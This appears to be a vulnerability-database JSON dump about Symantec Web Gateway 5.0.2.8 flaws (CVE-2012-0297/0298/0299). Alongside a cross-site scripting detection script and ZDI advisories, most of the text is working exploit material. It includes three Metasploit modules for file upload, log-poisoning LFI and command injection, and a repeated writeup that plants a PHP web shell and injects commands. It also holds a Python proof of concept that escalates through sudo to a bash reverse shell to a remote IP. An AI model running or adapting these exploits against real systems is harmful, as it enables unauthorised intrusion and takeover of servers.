script_mandatory_keys(\"symantec_web_gateway/installed\");\n script_tag(name:\"summary\", value:\"Symantec Web Gateway is prone to a cross-site scripting vulnerability\nbecause it fails to properly sanitize user-supplied input.\");\n\n script_tag(name:\"impact\", value:\"An attacker may leverage this issue to execute arbitrary script code\nin the browser of an unsuspecting user in the context of the affected\nsite. 
This may allow the attacker to steal cookie-based authentication\ncredentials and launch other attacks.\");\n\n script_tag(name:\"solution\", value:\"Updates are available. Please see the referenced vendor advisory for more information.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE))exit(0);\nif(!dir = get_app_location(cpe:CPE, port:port))exit(0);\n\nurl = string(dir, \"/spywall/timer.php?d=0&l=0'<script>alert(/xss-test/)</script>&profile=0\");\n\nif(http_vuln_check(port:port, url:url,pattern:\"<script>alert\\(/xss-test/\\)</script>\", check_header:TRUE)) {\n\n security_message(port:port);\n exit(0);\n\n}\n\nexit(0);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "securityvulns": [{"lastseen": "2021-06-08T19:13:51", "description": "Code execution, unfiltered shell characters.", "cvss3": {}, "published": "2012-06-13T00:00:00", "type": "securityvulns", "title": "Symantec WebGateway security vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2012-0297", "CVE-2012-0299"], "modified": "2012-06-13T00:00:00", "id": "SECURITYVULNS:VULN:12416", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12416", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:44", "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nZDI-12-091 : Symantec Web Gateway upload_file Remote Code Execution\r\nVulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-12-091\r\nJune 8, 2012\r\n\r\n- -- CVE ID:\r\n\r\nCVE-2012-0299\r\n\r\n- -- CVSS:\r\n\r\n7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P\r\n\r\n- -- Affected Vendors:\r\n\r\nSymantec\r\n\r\n- -- Affected Products:\r\n\r\nSymantec Web Gateway\r\n\r\n- -- Vulnerability Details:\r\n\r\nThis 
vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Symantec Web Gateway. Authentication is not\r\nrequired to exploit this vulnerability. \r\n\r\nThe specific flaw exists because Symantec Web Gateway allows\r\nunauthenticated users to upload a file while preserving the file extension.\r\nThis allows users to upload additional script files that can be used to\r\nexecute remote code from user supplied commands under the context of the\r\nwebserver. \r\n\r\n- -- Vendor Response:\r\n\r\nSymantec has issued an update to correct this vulnerability. More details\r\ncan be found at:\r\n\r\nhttp://www.symantec.com/security_response/securityupdates/detail.jsp?fid=se\r\ncurity_advisory&pvid=security_advisory&year=2012&suid=20120517_00\r\n\r\n- -- Disclosure Timeline:\r\n\r\n2011-11-22 - Vulnerability reported to vendor\r\n2012-06-08 - Coordinated public release of advisory\r\n\r\n- -- Credit:\r\n\r\nThis vulnerability was discovered by:\r\n\r\n* Tenable Network Security\r\n\r\n- -- About the Zero Day Initiative (ZDI):\r\n\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. 
Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi\r\n\r\n", "cvss3": {}, "published": "2012-06-13T00:00:00", "type": "securityvulns", "title": "ZDI-12-091 : Symantec Web Gateway upload_file Remote Code Execution Vulnerability", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2012-0299"], "modified": "2012-06-13T00:00:00", "id": "SECURITYVULNS:DOC:28147", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28147", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:44", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nZDI-12-090 : Symantec Web Gateway Shell Command Injection Remote Code\r\nExecution Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-12-090\r\nJune 8, 2012\r\n\r\n- -- CVE ID:\r\n\r\nCVE-2012-0297\r\n\r\n- -- CVSS:\r\n7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P\r\n\r\n- -- Affected Vendors:\r\n\r\nSymantec\r\n\r\n- -- Affected Products:\r\n\r\nSymantec Web 
Gateway\r\n\r\n- -- Vulnerability Details:\r\n\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Symantec Web Gateway. Authentication is not\r\nrequired to exploit this vulnerability. \r\n\r\nThe specific flaw exists due to insufficiently filtered user-supplied data\r\nused in a call to exec() in multiple script pages. The affected scripts are\r\nlocated in '/spywall/ipchange.php' and 'network.php'. There is also a flaw\r\nin '/spywall/download_file.php' that allows unauthenticated users to\r\ndownload and delete any file on the server. \r\n\r\n- -- Vendor Response:\r\n\r\nSymantec has issued an update to correct this vulnerability. More details\r\ncan be found at:\r\n\r\nhttp://www.symantec.com/security_response/securityupdates/detail.jsp?fid=se\r\ncurity_advisory&pvid=security_advisory&year=2012&suid=20120517_00\r\n\r\n- -- Disclosure Timeline:\r\n\r\n2011-11-22 - Vulnerability reported to vendor\r\n2012-06-08 - Coordinated public release of advisory\r\n\r\n- -- Credit:\r\n\r\nThis vulnerability was discovered by:\r\n\r\n* Tenable Network Security\r\n\r\n- -- About the Zero Day Initiative (ZDI):\r\n\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. 
Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi\r\n\r\n", "cvss3": {}, "published": "2012-06-13T00:00:00", "type": "securityvulns", "title": "ZDI-12-090 : Symantec Web Gateway Shell Command Injection Remote Code Execution Vulnerability", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2012-0297"], "modified": "2012-06-13T00:00:00", "id": "SECURITYVULNS:DOC:28148", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28148", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2018-07-03T19:16:51", "description": "", "cvss3": {}, "published": "2014-07-01T00:00:00", "type": "seebug", "title": "symantec web gateway 5.0.2.8 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0297", "CVE-2012-0298"], "modified": 
"2014-07-01T00:00:00", "id": "SSV:73332", "href": "https://www.seebug.org/vuldb/ssvid-73332", "sourceData": "\n Software: Symantec Web Gateway\r\nCurrent Software Version: 5.0.2.8\r\nProduct homepage: www.symantec.com\r\nAuthor: S2 Crew [Hungary]\r\nCVE: CVE-2012-0297, CVE-2012-0298, ???\r\n\r\nFile include:\r\n https://192.168.82.207/spywall/previewProxyError.php?err=../../../../../../../../etc/passwd\r\n\r\nFile include and OS command execution:\r\n http://192.168.82.207/spywall/releasenotes.php?relfile=../../../../../../etc/passwd\r\n You can execute OS commands just include the error_log:\r\n /usr/local/apache2/logs/\r\n -rw-r--r-- 1 root root 5925 Nov 15 07:25 access_log\r\n -rw-r--r-- 1 root root 3460 Nov 15 07:21 error_log\r\n\r\n Make a connection to port 80:\r\n <?php\r\n $f = fopen('/var/www/html/spywall/cleaner/cmd.php','w');\r\n $cmd = "<?php system(\\$_GET['cmd']); ?>";\r\n fputs($f,$cmd);\r\n fclose($f);\r\n\t\tprint "Shell creation done<br>";\r\n ?>\r\n\r\nArbitary file download and delete:\r\n https://192.168.82.207/spywall/download_file.php?d=/tmp/addroutelog&name=addroutelog\r\n\td parameter: the complete filename \r\n After the download process application removes the original file with root access! 
:)\r\n\r\n Command execution methods:\r\n 1.Method\r\n Download and delete the /var/www/html/ciu/.htaccess file.\r\n After it you can access the ciu interface on web.\r\n There is an upload script: /ciu/uploadFile.php\r\n\tUser can control the filename and the upload location:\r\n $_FILES['uploadFile'];\r\n $_POST['uploadLocation'];\r\n\r\n 2.Method\r\n <form action="https://192.168.82.192/ciu/remoteRepairs.php" method="POST" enctype="multipart/form-data">\r\n <input type="file" name="uploadFile">\r\n <input type="text" name="action" value="upload">\r\n <input type="text" name="uploadLocation" value="/var/www/html/spywall/cleaner/">\r\n <input type="hidden" name="configuration" value="test">\r\n <input type="submit" value="upload!">\r\n </form>\r\n\t\r\n\tThe "/var/www/html/spywall/cleaner" is writeable by www-data.\r\n\r\nCommand execution after authentication:\r\n\r\n http://192.168.82.207/spywall/adminConfig.php (this is deprecated config file, it should be remove)\r\n\r\n From the modified POST message:\r\n Content-Disposition: form-data; name="pingaddress"\r\n 127.0.0.1`whoami>/tmp/1234.txt`\r\n\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-73332", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:06:08", "description": "\nsymantec Web gateway 5.0.2.8 - Multiple Vulnerabilities", "cvss3": {}, "published": "2012-06-27T00:00:00", "type": "exploitpack", "title": "symantec Web gateway 5.0.2.8 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0298", "CVE-2012-0297"], "modified": "2012-06-27T00:00:00", "id": "EXPLOITPACK:9A23BC40C97079E951A8BC4B95B92342", "href": "", "sourceData": "Software: Symantec Web Gateway\nCurrent Software Version: 5.0.2.8\nProduct homepage: www.symantec.com\nAuthor: S2 Crew [Hungary]\nCVE: CVE-2012-0297, CVE-2012-0298, ???\n\nFile include:\n https://192.168.82.207/spywall/previewProxyError.php?err=../../../../../../../../etc/passwd\n\nFile include and OS command execution:\n http://192.168.82.207/spywall/releasenotes.php?relfile=../../../../../../etc/passwd\n You can execute OS commands just include the error_log:\n /usr/local/apache2/logs/\n -rw-r--r-- 1 root root 5925 Nov 15 07:25 access_log\n -rw-r--r-- 1 root root 3460 Nov 15 07:21 error_log\n\n Make a connection to port 80:\n <?php\n $f = fopen('/var/www/html/spywall/cleaner/cmd.php','w');\n $cmd = \"<?php system(\\$_GET['cmd']); ?>\";\n fputs($f,$cmd);\n fclose($f);\n\t\tprint \"Shell creation done<br>\";\n ?>\n\nArbitary file download and delete:\n https://192.168.82.207/spywall/download_file.php?d=/tmp/addroutelog&name=addroutelog\n\td parameter: the complete filename \n After the download process application removes the original file with root access! 
:)\n\n Command execution methods:\n 1.Method\n Download and delete the /var/www/html/ciu/.htaccess file.\n After it you can access the ciu interface on web.\n There is an upload script: /ciu/uploadFile.php\n\tUser can control the filename and the upload location:\n $_FILES['uploadFile'];\n $_POST['uploadLocation'];\n\n 2.Method\n <form action=\"https://192.168.82.192/ciu/remoteRepairs.php\" method=\"POST\" enctype=\"multipart/form-data\">\n <input type=\"file\" name=\"uploadFile\">\n <input type=\"text\" name=\"action\" value=\"upload\">\n <input type=\"text\" name=\"uploadLocation\" value=\"/var/www/html/spywall/cleaner/\">\n <input type=\"hidden\" name=\"configuration\" value=\"test\">\n <input type=\"submit\" value=\"upload!\">\n </form>\n\t\n\tThe \"/var/www/html/spywall/cleaner\" is writeable by www-data.\n\nCommand execution after authentication:\n\n http://192.168.82.207/spywall/adminConfig.php (this is deprecated config file, it should be remove)\n\n From the modified POST message:\n Content-Disposition: form-data; name=\"pingaddress\"\n 127.0.0.1`whoami>/tmp/1234.txt`", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:06", "description": "", "cvss3": {}, "published": "2012-06-27T00:00:00", "type": "packetstorm", "title": "Symantec Web Gateway 5.0.28 LFI / Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0298", "CVE-2012-0297"], "modified": "2012-06-27T00:00:00", "id": "PACKETSTORM:114231", "href": "https://packetstormsecurity.com/files/114231/Symantec-Web-Gateway-5.0.28-LFI-Code-Execution.html", "sourceData": "`Software: Symantec Web Gateway \nCurrent Software Version: 5.0.2.8 \nProduct homepage: www.symantec.com \nAuthor: S2 Crew [Hungary] \nCVE: CVE-2012-0297, CVE-2012-0298, ??? 
\n \nFile include: \nhttps://192.168.82.207/spywall/previewProxyError.php?err=../../../../../../../../etc/passwd \n \nFile include and OS command execution: \nhttp://192.168.82.207/spywall/releasenotes.php?relfile=../../../../../../etc/passwd \nYou can execute OS commands just include the error_log: \n/usr/local/apache2/logs/ \n-rw-r--r-- 1 root root 5925 Nov 15 07:25 access_log \n-rw-r--r-- 1 root root 3460 Nov 15 07:21 error_log \n \nMake a connection to port 80: \n<?php \n$f = fopen('/var/www/html/spywall/cleaner/cmd.php','w'); \n$cmd = \"<?php system(\\$_GET['cmd']); ?>\"; \nfputs($f,$cmd); \nfclose($f); \nprint \"Shell creation done<br>\"; \n?> \n \nArbitary file download and delete: \nhttps://192.168.82.207/spywall/download_file.php?d=/tmp/addroutelog&name=addroutelog \nd parameter: the complete filename \nAfter the download process application removes the original file with root access! :) \n \nCommand execution methods: \n1.Method \nDownload and delete the /var/www/html/ciu/.htaccess file. \nAfter it you can access the ciu interface on web. \nThere is an upload script: /ciu/uploadFile.php \nUser can control the filename and the upload location: \n$_FILES['uploadFile']; \n$_POST['uploadLocation']; \n \n2.Method \n<form action=\"https://192.168.82.192/ciu/remoteRepairs.php\" method=\"POST\" enctype=\"multipart/form-data\"> \n<input type=\"file\" name=\"uploadFile\"> \n<input type=\"text\" name=\"action\" value=\"upload\"> \n<input type=\"text\" name=\"uploadLocation\" value=\"/var/www/html/spywall/cleaner/\"> \n<input type=\"hidden\" name=\"configuration\" value=\"test\"> \n<input type=\"submit\" value=\"upload!\"> \n</form> \n \nThe \"/var/www/html/spywall/cleaner\" is writeable by www-data. 
\n \nCommand execution after authentication: \n \nhttp://192.168.82.207/spywall/adminConfig.php (this is deprecated config file, it should be remove) \n \nFrom the modified POST message: \nContent-Disposition: form-data; name=\"pingaddress\" \n127.0.0.1`whoami>/tmp/1234.txt` \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/114231/symantecwg-lfiexec.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:20:02", "description": "", "cvss3": {}, "published": "2012-06-11T00:00:00", "type": "packetstorm", "title": "Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0299"], "modified": "2012-06-11T00:00:00", "id": "PACKETSTORM:113486", "href": "https://packetstormsecurity.com/files/113486/Symantec-Web-Gateway-5.0.2.8-Arbitrary-PHP-File-Upload-Vulnerability.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability\", \n'Description' => %q{ \nThis module exploits a file upload vulnerability found in Symantec Web Gateway's \nHTTP service. Due to the incorrect use of file extensions in the upload_file() \nfunction, this allows us to abuse the spywall/blocked_file.php file in order to \nupload a malicious PHP file without any authentication, which results in arbitrary \ncode execution. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Tenable Network Security', # Vulnerability Discovery \n'juan vazquez' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2012-0299' ], \n[ 'OSVDB', '82025' ], \n[ 'BID', '53443' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-091' ], \n[ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00' ] \n], \n'Payload' => \n{ \n'BadChars' => \"\\x00\" \n}, \n'DefaultOptions' => \n{ \n'ExitFunction' => \"none\" \n}, \n'Platform' => ['php'], \n'Arch' => ARCH_PHP, \n'Targets' => \n[ \n['Symantec Web Gateway 5.0.2.8', {}], \n], \n'Privileged' => false, \n'DisclosureDate' => \"May 17 2012\", \n'DefaultTarget' => 0)) \nend \n \n \ndef check \nres = send_request_raw({ \n'method' => 'GET', \n'uri' => '/spywall/login.php' \n}) \n \nif res and res.body =~ /\\<title\\>Symantec Web Gateway\\<\\/title\\>/ \nreturn Exploit::CheckCode::Detected \nelse \nreturn Exploit::CheckCode::Safe \nend \nend \n \ndef on_new_session(client) \nif client.type == \"meterpreter\" \nclient.core.use(\"stdapi\") if not client.ext.aliases.include?(\"stdapi\") \nclient.fs.file.rm(\"temp.php\") \nelse \nclient.shell_command_token(\"rm temp.php\") \nend \nend \n \ndef exploit \nuri = target_uri.path \nuri << '/' if uri[-1,1] != '/' \n \npeer = \"#{rhost}:#{rport}\" \npayload_name = Rex::Text.rand_text_alpha(rand(10) + 5) + '.php' \nbefore_filename = rand_text_alpha(rand(10) + 5) \nafter_filename = rand_text_alpha(rand(10) + 5) \n \npost_data = Rex::MIME::Message.new \npost_data.add_part(\"true\", nil, nil, \"form-data; name=\\\"submitted\\\"\") \npost_data.add_part(before_filename, \"application/octet-stream\", nil, \"form-data; name=\\\"before_filename\\\"\") \npost_data.add_part(after_filename, \"application/octet-stream\", nil, \"form-data; name=\\\"after_filename\\\"\") \npost_data.add_part(\"<?php #{payload.encoded} ?>\", 
\"image/gif\", nil, \"form-data; name=\\\"new_image\\\"; filename=\\\"#{payload_name}\\\"\") \n \nprint_status(\"#{peer} - Sending PHP payload (#{payload_name})\") \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => \"#{uri}spywall/blocked_file.php\", \n'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\", \n'data' => post_data.to_s \n}) \n \n# If the server returns 200 and the body contains the name \n# of the default file, we assume we uploaded the malicious \n# file successfully \nif not res or res.code != 200 or res.body !~ /temp.php/ \nprint_error(\"#{peer} - File wasn't uploaded, aborting!\") \nreturn \nend \n \nprint_status(\"#{peer} - Executing PHP payload (#{payload_name})\") \n# Execute our payload \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => \"#{uri}spywall/images/upload/temp/temp.php\" \n}) \n \n# If we don't get a 200 when we request our malicious payload, we suspect \n# we don't have a shell, either. Print the status code for debugging purposes. \nif res and res.code != 200 \nprint_status(\"#{peer} - Server returned #{res.code.to_s}\") \nend \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/113486/symantec_web_gateway_file_upload.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:14:57", "description": "", "cvss3": {}, "published": "2012-05-28T00:00:00", "type": "packetstorm", "title": "Symantec Web Gateway 5.0.2.8 Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0297"], "modified": "2012-05-28T00:00:00", "id": "PACKETSTORM:113090", "href": "https://packetstormsecurity.com/files/113090/Symantec-Web-Gateway-5.0.2.8-Command-Execution.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. 
Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Symantec Web Gateway 5.0.2.8 Command Execution Vulnerability\", \n'Description' => %q{ \nThis module exploits a vulnerability found in Symantec Web Gateway's HTTP \nservice. By injecting PHP code in the access log, it is possible to load it \nwith a directory traversal flaw, which allows remote code execution under the \ncontext of 'apache'. Please note that it may take up to several minutes to \nretrieve access_log, which is about the amount of time required to see a shell \nback. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Unknown', #Discovery \n'muts', #PoC \n'sinn3r' #Metasploit \n], \n'References' => \n[ \n['CVE', '2012-0297'], \n['EDB', '18932'], \n['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00'] \n], \n'Payload' => \n{ \n'BadChars' => \"\\x00\" \n}, \n'DefaultOptions' => \n{ \n'WfsDelay' => 300, #5 minutes \n'DisablePayloadHandler' => 'false', \n'ExitFunction' => \"none\" \n}, \n'Platform' => ['php'], \n'Arch' => ARCH_PHP, \n'Targets' => \n[ \n['Symantec Web Gateway 5.0.2.8', {}], \n], \n'Privileged' => false, \n'DisclosureDate' => \"May 17 2012\", \n'DefaultTarget' => 0)) \nend \n \n \ndef check \nres = send_request_raw({ \n'method' => 'GET', \n'uri' => '/spywall/login.php' \n}) \n \nif res and res.body =~ /\\<title\\>Symantec Web Gateway\\<\\/title\\>/ \nreturn Exploit::CheckCode::Detected \nelse \nreturn Exploit::CheckCode::Safe \nend \nend \n \n \ndef exploit \npeer = \"#{rhost}:#{rport}\" \n \nphp = %Q|<?php #{payload.encoded} ?>| \n \n# Inject PHP to log \nprint_status(\"#{peer} - Injecting PHP 
to log...\") \nres = send_request_raw({ \n'method' => 'GET', \n'uri' => \"/#{php}\" \n}) \n \nselect(nil, nil, nil, 1) \n \n# Use the directory traversal to load the PHP code \n# access_log takes a long time to retrieve \nprint_status(\"#{peer} - Loading PHP code..\") \nsend_request_raw({ \n'method' => 'GET', \n'uri' => '/spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log' \n}) \n \nprint_status(\"#{peer} - Waiting for a session, may take some time...\") \n \nselect(nil, nil, nil, 1) \n \nhandler \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/113090/symantec_web_gateway_lfi.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:12:40", "description": "", "cvss3": {}, "published": "2012-06-11T00:00:00", "type": "packetstorm", "title": "Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0297"], "modified": "2012-06-11T00:00:00", "id": "PACKETSTORM:113485", "href": "https://packetstormsecurity.com/files/113485/Symantec-Web-Gateway-5.0.2.8-ipchange.php-Command-Injection.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection\", \n'Description' => %q{ \nThis module exploits a command injection vulnerability found in Symantec Web \nGateway's HTTP service due to the insecure usage of the exec() function. 
This module \nabuses the spywall/ipchange.php file to execute arbitrary OS commands without \nauthentication. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Tenable Network Security', # Vulnerability Discovery \n'juan vazquez' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2012-0297' ], \n[ 'BID', '53444' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-090' ], \n[ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00' ] \n], \n'Payload' => \n{ \n'BadChars' => \"\\x00\\x0d\\x0a\\x26\", \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl', \n} \n}, \n'Platform' => ['unix'], \n'Arch' => ARCH_CMD, \n'Targets' => \n[ \n['Symantec Web Gateway 5.0.2.8', {}], \n], \n'Privileged' => false, \n'DisclosureDate' => \"May 17 2012\", \n'DefaultTarget' => 0)) \nend \n \n \ndef check \nres = send_request_raw({ \n'method' => 'GET', \n'uri' => '/spywall/login.php' \n}) \n \nif res and res.body =~ /\\<title\\>Symantec Web Gateway\\<\\/title\\>/ \nreturn Exploit::CheckCode::Detected \nelse \nreturn Exploit::CheckCode::Safe \nend \nend \n \ndef exploit \nuri = target_uri.path \nuri << '/' if uri[-1,1] != '/' \n \npeer = \"#{rhost}:#{rport}\" \n \npost_data = \"subnet=\" \npost_data << \"\\\";\" + payload.raw + \";#\" \n \nprint_status(\"#{peer} - Sending Command injection\") \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => \"#{uri}spywall/ipchange.php\", \n'data' => post_data \n}) \n \n# If the server doesn't return the default redirection, probably \n# something is wrong \nif not res or res.code != 302 or res.headers['Location'] !~ /SW\\/admin_config.php/ \nprint_error(\"#{peer} - Probably command not executed, aborting!\") \nreturn \nend \n \nend \n \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/113485/symantec_web_gateway_exec.rb.txt", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:20:43", "description": "", "cvss3": {}, "published": "2012-05-26T00:00:00", "type": "packetstorm", "title": "Symantec Web Gateway 5.0.2 Local File Inclusion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0297"], "modified": "2012-05-26T00:00:00", "id": "PACKETSTORM:113050", "href": "https://packetstormsecurity.com/files/113050/Symantec-Web-Gateway-5.0.2-Local-File-Inclusion.html", "sourceData": "`#!/usr/bin/python \n \n# Symantec Web Gateway 5.0.2 Remote LFI root Exploit Proof of Concept \n# Exploit requires no authentication, /tmp/networkScript is sudoable and apache writable. \n# muts at offensive-security dot com \n \n \nimport socket \nimport base64 \n \npayload= '''echo '#!/bin/bash' > /tmp/networkScript; echo 'bash -i >& /dev/tcp/172.16.164.1/1234 0>&1' >> /tmp/networkScript;chmod 755 /tmp/networkScript; sudo /tmp/networkScript''' \npayloadencoded=base64.encodestring(payload).replace(\"\\n\",\"\") \ntaint=\"GET /<?php shell_exec(base64_decode('%s'));?> HTTP/1.1\\r\\n\\r\\n\" % payloadencoded \n \nexpl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) \nexpl.connect((\"172.16.164.129\", 80)) \nexpl.send(taint) \nexpl.close() \n \ntrigger=\"GET /spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log HTTP/1.0\\r\\n\\r\\n\" \nexpl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) \nexpl.connect((\"172.16.164.129\", 80)) \nexpl.send(trigger) \nexpl.close() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/113050/symantecwg-lfi.txt", "cvss": {"score": 